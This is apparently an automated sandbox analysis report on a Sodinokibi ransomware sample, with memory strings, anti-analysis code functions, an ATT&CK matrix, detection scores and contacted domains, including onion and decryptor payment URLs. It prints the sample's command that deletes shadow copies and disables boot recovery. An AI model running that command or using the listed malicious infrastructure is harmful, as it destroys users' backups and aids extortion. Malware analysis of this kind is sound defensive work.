Source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146393174.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052813472.000000000257B000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052687517.000000000256D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113039589.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec13\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\#
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\:
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.19041.1_en-us_369e8b635061fdb3\Z
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.19041.1_en-us_4373d0692dcd3a06\z
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\b
Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\r\
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\r\I#'
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\
Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2135529974.0000000003BCB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\r\(
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\r\
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\r\_
Source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146393174.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052813472.000000000257B000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052687517.000000000256D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113039589.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.19041.1_none_a87cce111f2d21d5\
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153961554.0000000003B73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\f\+
Source: RQzHm5vLxs.exe, 00000000.00000003.2063224091.00000000024E8000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.00000000024DC000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2112907141.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119251929.00000000024EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\f\_
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\E
Source: RQzHm5vLxs.exe, 00000000.00000003.2083442379.00000000039F9000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2083589826.0000000003A4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.1_none_97e0d8d7edeea164\
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\f\D
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.19041.1_en-gb_71570953289cd4d0\Z
Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153961554.0000000003B73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\f\
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.19041.1_en-us_a3e0d97c4c052586\:
Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\f\
Source: RQzHm5vLxs.exe, 00000000.00000002.2927128604.000000000257D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3
Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\f\89K
Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\
Source: RQzHm5vLxs.exe, 00000000.00000003.2119219136.00000000024FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D93B35 HeapCreate,GetProcessHeap,

0_2_00D93B35

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D949C2 rdtsc

0_2_00D949C2

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Code function: 0_2_00D941FC mov eax, dword ptr fs:[00000030h]		0_2_00D941FC
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Code function: 0_2_00D94562 mov ecx, dword ptr fs:[00000030h]		0_2_00D94562

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures

Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D93D05 cpuid

0_2_00D93D05

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D942A2 GetUserNameW,

0_2_00D942A2

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
1 Replication Through Removable Media	12 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 DLL Side-Loading	OS Credential Dumping	11 Peripheral Device Discovery	1 Replication Through Removable Media	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Data Obfuscation	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	2 Data Encrypted for Impact	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	11 File Deletion	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	SIM Card Swap	Obtain Device Cloud Backups	1 Inhibit System Recovery	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Masquerading	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	21 Encrypted Channel			1 Defacement	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	1 Virtualization/Sandbox Evasion	NTDS	24 System Information Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	3 Non-Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	Scheduled Transfer	14 Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Data Transfer Size Limits	1 Proxy			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
RQzHm5vLxs.exe	92%	ReversingLabs	Win32.Ransomware.Sodinokibi
RQzHm5vLxs.exe	100%	Avira	TR/Crypt.XPACK.Gen
RQzHm5vLxs.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://p-ride.live:443/data/image/oe.gifv1.0	0%	Avira URL Cloud	safe
https://patriotcleaning.net:443/admin/graphic/ervzot.jpgs	100%	Avira URL Cloud	malware
https://so-sage.fr/	0%	Avira URL Cloud	safe
http://decryptor.top/45C1E9BA4D645606	100%	Avira URL Cloud	malware
https://rarefoods.ro:443/admin/pics/wcyshd.pngebResources	0%	Avira URL Cloud	safe
https://brownswoodblog.com:443/admin/pics/hdxsmg.gifData	0%	Avira URL Cloud	safe
https://p-ride.live/data/image/oe.gif	0%	Avira URL Cloud	safe
https://so-sage.fr/1	0%	Avira URL Cloud	safe
https://so-sage.fr/news/game/bvprbb.png	0%	Avira URL Cloud	safe
https://brownswoodblog.com/admin/pics/hdxsmg.gifmsu	0%	Avira URL Cloud	safe
https://rarefoods.ro/r	0%	Avira URL Cloud	safe
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606	100%	Avira URL Cloud	malware
https://brownswoodblog.com/admin/pics/hdxsmg.gif	0%	Avira URL Cloud	safe
https://rarefoods.ro/admin/pics/wcyshd.png	0%	Avira URL Cloud	safe
https://patriotcleaning.net/admin/graphic/ervzot.jpg	100%	Avira URL Cloud	malware
https://brownswoodblog.com/	0%	Avira URL Cloud	safe
https://avtoboss163.ru:443/static/assets/hbhezx.pngources	0%	Avira URL Cloud	safe
https://avtoboss163.ru/static/assets/hbhezx.png	0%	Avira URL Cloud	safe
http://brownswoodblog.com/	0%	Avira URL Cloud	safe
https://so-sage.fr/Y	0%	Avira URL Cloud	safe
https://rarefoods.ro/admin/pics/wcyshd.png1	0%	Avira URL Cloud	safe
https://patriotcleaning.net/	100%	Avira URL Cloud	malware
https://avtoboss163.ru/	0%	Avira URL Cloud	safe
https://rarefoods.ro/	0%	Avira URL Cloud	safe
https://patriotcleaning.net/W	100%	Avira URL Cloud	malware
https://so-sage.fr:443/news/game/bvprbb.pngt	0%	Avira URL Cloud	safe
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/	100%	Avira URL Cloud	malware
http://decryptor.top/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
avtoboss163.ru	185.32.57.142	true	true	unknown
patriotcleaning.net	138.197.111.104	true	true	unknown
so-sage.fr	137.74.231.3	true	true	unknown
p-ride.live	172.67.132.175	true	true	unknown
brownswoodblog.com	172.67.219.93	true	true	unknown
rarefoods.ro	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://so-sage.fr/news/game/bvprbb.png	false	Avira URL Cloud: safe	unknown
https://p-ride.live/data/image/oe.gif	false	Avira URL Cloud: safe	unknown
https://patriotcleaning.net/admin/graphic/ervzot.jpg	false	Avira URL Cloud: malware	unknown
https://avtoboss163.ru/static/assets/hbhezx.png	false	Avira URL Cloud: safe	unknown
https://brownswoodblog.com/admin/pics/hdxsmg.gif	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://so-sage.fr/	RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rarefoods.ro:443/admin/pics/wcyshd.pngebResources	RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://p-ride.live:443/data/image/oe.gifv1.0	RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://so-sage.fr/1	RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://decryptor.top/45C1E9BA4D645606	RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.dr, 985drm9-readme.txt30.0.dr, 985drm9-readme.txt47.0.dr, 985drm9-readme.txt31.0.dr	false	Avira URL Cloud: malware	unknown
https://brownswoodblog.com:443/admin/pics/hdxsmg.gifData	RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://torproject.org/	RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.dr	false		high
https://patriotcleaning.net:443/admin/graphic/ervzot.jpgs	RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://brownswoodblog.com/admin/pics/hdxsmg.gifmsu	RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rarefoods.ro/r	RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
